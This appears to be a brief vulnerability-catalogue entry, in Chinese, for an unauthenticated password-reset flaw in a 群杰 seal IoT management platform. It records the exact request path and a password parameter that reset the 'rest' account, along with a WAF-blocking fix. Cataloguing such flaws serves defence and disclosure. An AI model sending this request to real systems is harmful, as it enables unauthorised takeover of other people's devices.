vendor = "群杰"
name = "群杰印章物联网管理平台rest密码重置"
type = "未授权访问"
version = "未知"
path = "/api/token/updateRestUser?restname=rest&password="
detail = "/api/token/updateRestUser?restname=rest&password={{password}}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0729"
label = "nday"
